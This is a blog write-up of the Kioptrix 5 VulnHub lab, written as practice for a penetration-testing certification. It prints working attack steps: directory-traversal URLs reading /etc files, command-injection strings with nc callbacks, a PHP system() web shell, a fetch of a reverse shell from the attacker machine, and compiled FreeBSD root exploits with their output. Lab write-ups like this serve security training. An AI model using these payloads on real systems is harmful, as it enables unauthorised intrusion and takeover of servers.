Kioptrix 5 Write-Up

October 22, 2017
Security
Pentesting
Vulnhub

To prepare for OSCP¹ I’m planning to do a whole bunch of VulnHub VMs and other challenges. Doing these VMs and creating write-ups should give a good amount of practice before I start with the actual PWK¹ course.

Kioptrix 5

The Kioptrix series consist of multiple beginner boot2root VMs with multiple ways to gain a root shell².

Setup

I’m using VMware with two VMs: Kali 2017.1 and Kioptrix 5.

Scanning & Enumeration

After finding the IP of the kioptrix VM it’s possible to perform the usual Nmap scan to get a quick overview of what is running on the VM. One thing that immediately catches the eye is the fact that it says that it is running FreeBSD - I’m curious how this will compare to a normal Linux install.

root@vm-kali:~# nmap -T4 -sV 172.16.45.137
Starting Nmap 7.40 ( https://nmap.org ) at 2017-09-09 16:46 MDT
Nmap scan report for 172.16.45.137
Host is up (0.00020s latency).
Not shown: 997 filtered ports
PORT     STATE  SERVICE VERSION
22/tcp   closed ssh
80/tcp   open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
8080/tcp open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
MAC Address: 00:0C:29:9F:53:4E (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.00 seconds

While the website on port 8080 is not accessible, the website on port 80 contains a hint to a URL that is available:

<!--  <META HTTP-EQUIV="refresh" CONTENT="5;URL=pChart2.1.3/index.php">  -->

Web Vulnerabilities

According to searchsploit PChart has multiple vulnerabilities, one of the vulnerabilities is a directory traversal that seems easy to abuse³.

root@vm-kali:~# searchsploit pchart
------------------------------------------------ ----------------------------------
 Exploit Title                                  |  Path
                                                | (/usr/share/exploitdb/platforms/)
------------------------------------------------ ----------------------------------
pChart 2.1.3 - Multiple Vulnerabilities         | php/webapps/31173.txt
------------------------------------------------ ----------------------------------

It’s possible to look at all kinds of files, but most aren’t that interesting…

index.php?Action=View&Script=/../../../../../etc/rc.conf

hostname="kioptrix2014"
ifconfig_em0="DHCP"
sshd_enable="NO"
# Set dumpdev to "AUTO" to enable crash dumps, "NO" to disable
dumpdev="NO"
apache22_enable="YES"
mysql_enable="YES"
firewall_enable="YES"
firewall_script="/etc/ipfw.rules"
ossechids_enable="YES"
rc_debug="NO"
monitor_enable="YES"

index.php?Action=View&Script=/../../../../../etc/ipfw.rules

 #!/bin/sh
ipfw -q -f flush
cmd="ipfw -a add"
pif="em0"

--snip--

After a bit of research on how file locations might differ compared to a Linux install, and some trial and error, there was the apache config file that paved the way towards the next step:

index.php?Action=View&Script=/../../../../../usr/local/etc/apache22/httpd.conf

--snip--

SetEnvIf User-Agent ^Mozilla/4.0 Mozilla4_browser

<VirtualHost *:8080>
    DocumentRoot /usr/local/www/apache22/data2

<Directory "/usr/local/www/apache22/data2">
    Options Indexes FollowSymLinks
    AllowOverride All
    Order allow,deny
    Allow from env=Mozilla4_browser
</Directory>

--snip--

So in order to access the website hosted on port 8080 we need a specific user agent. Luckily there are a whole variety of different browser plugins that allow you to change your user agent. Doing this gives access to a phptax website.

Basic Shell

There was especially one interesting page on the phptax website that already contained various tries to get a shell (the snippet may contain some of my attempts as well):

http://172.16.45.137:8080/phptax/data/pdf/

•  1040d-pg2.png
•  1040d-pg2.png;ls;
•  1040d-pg2.png;nc -192.168.1.191 4444;
•  1040d-pg2.png;nc -l -p4444;
•  1040d-pg2.png;nc -l 4444;
•  1040d-pg2.png;nc -lvp 4444;
•  1040d1-pg2.png
•  1040d1-pg2.png 
•  1040d1-pg2.png;cat shell.txt > shell.php;
•  1040d1-pg2.png;id > bla;
•  1040d1-pg2.png;mv shell.php shell.txt;
•  1040d1-pg2.png;mv shell.txt shell.php;
•  1040d1-pg2.png;mv shell.txt.shell.php;
•  1040d1-pg2.png;nc -p 4444 > bla;
•  1040d1-pg2.png;nc 192.168.1.191 4444;
•  1040d1-pg2.png;nc 192.168.1.191 4444> bla;
•  1040d1-pg2.png;nc > bla;
•  1040d1-pg2.png;php shell.txt;
•  1040d1-pg2.png;ping 192.168.1.191 > bla;
•  1040d1-pg2.png;pwd > bla;
•  1040d1-pg2.png;rm shell.txt;
•  1040d1-pg2.png;touch bla;
•  1040d1-pg2.png;touch hello.txt;
•  1040d1-pg2.png;which fetch -h > bla;
•  1040d1-pg2.png;which nc > bla;
•  1040d1-pg2.png;which php > bla;
•  1040d1-pg2.png;which wget -h > bla;
•  1040d1-pg2.png;which wget > bla;
•  1040d1-pg2.png;whoami;
•  1040d1-pg2;mv shell.txt shell.php;

Again, by checking searchsploit we can determine that PHPTax is potentially vulnerable⁴:

root@vm-kali:~# searchsploit phptax
------------------------------------------------ ----------------------------------
 Exploit Title                                  |  Path
                                                | (/usr/share/exploitdb/platforms/)
------------------------------------------------ ----------------------------------
PhpTax - pfilez Parameter Exec Remote Code Inje | php/webapps/21833.rb
PhpTax 0.8 - File Manipulation (newvalue) / Rem | php/webapps/25849.txt
phptax 0.8 - Remote Code Execution              | php/webapps/21665.txt
------------------------------------------------ ----------------------------------

After a bit of fiddling it’s possible to get a simple PHP system shell:

index.php?pfilez=1040d1-pg2.tob;echo "<?php system(\$_GET[\"c\"]); ?>" > shell.php;&pdf=make

view-source:http://172.16.45.137:8080/phptax/shell.php?c=ls

--snip--

Such a simple shell is great to do some basic things, but it’s better to have a reverse shell. This can be achieved by transferring a shell⁵ from the Kali machine to the target system via the Python SimpleHTTPServer.

view-source:http://172.16.45.137:8080/phptax/shell.php?c=fetch%20http://172.16.45.130:8000/shell.php

root@kali:~/Documents/labs/kioptrix5# python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
172.16.45.137 - - [14/Sep/2017 21:53:22] "GET /shell.php HTTP/1.1" 200 -

root@kali:~/Documents/labs/kioptrix5# nc -nvlp 22446
listening on [any] 22446 ...
connect to [172.16.45.130] from (UNKNOWN) [172.16.45.137] 56522
FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan  3 07:46:30 UTC 2012     [email protected]:/usr/obj/usr/src/sys/GENERIC  amd64
 3:15PM  up 9 mins, 0 users, load averages: 0.00, 0.04, 0.04
USER       TTY      FROM                      LOGIN@  IDLE WHAT
uid=80(www) gid=80(www) groups=80(www)
sh: can't access tty; job control turned off
$

Privilege Escalation

GCC is installed and finding the privilege escalation was quite easy by using searchploit and looking for FreeBSD 9.0 - there were at least two different exploits that worked⁶⁷. I transferred the code from the kali machine to the target with the python SimpleHTTPServer.

$ fetch http://172.16.45.130:8000/28718.c
28718.c                                               5563  B   32 MBps
$ gcc -o 28718 28718.c
28718.c:178:2: warning: no newline at end of file
$ ./28718
[+] SYSRET FUCKUP!!
[+] Start Engine...
[+] Crotz...
[+] Crotz...
[+] Crotz...
[+] Woohoo!!!
$ id
uid=0(root) gid=0(wheel) groups=0(wheel)

$ fetch http://172.16.45.130:8000/26368.c
26368.c                                               2213  B   14 MBps
$ gcc -o 26368 26368.c
26368.c:89:2: warning: no newline at end of file
$ ./26368
id
uid=0(root) gid=0(wheel) egid=80(www) groups=80(www)

Additional Notes / Lessons Learned

I really enjoyed that this VM was based on FreeBSD and I have to say that I really enjoyed working through the Kioptrix series.